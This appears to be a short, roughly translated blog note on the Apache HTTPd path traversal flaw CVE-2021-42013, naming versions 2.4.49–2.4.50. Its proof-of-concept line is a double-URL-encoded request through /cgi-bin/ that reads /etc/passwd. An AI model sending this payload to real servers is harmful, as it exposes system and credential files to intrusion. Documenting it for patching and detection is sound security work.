Apache HTTPd path crossing vulnerability CVE-2021-42013
Apache HTTPd path crossing vulnerability CVE-2021-42013
Apache HTTPd path crossing vulnerability CVE-2021-42013
Vulnerability Description
Apache HTTPD is an HTTP server that can run PHP web pages through mod_php.
Vulnerability Impact
Apache HTTPd version 2.4.49~2.4.50
Network surveying and mapping
Vulnerability reappears
Get the Apache version through the response package
Verify POC
1
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
This post is licensed under CC BY 4.0 by the author.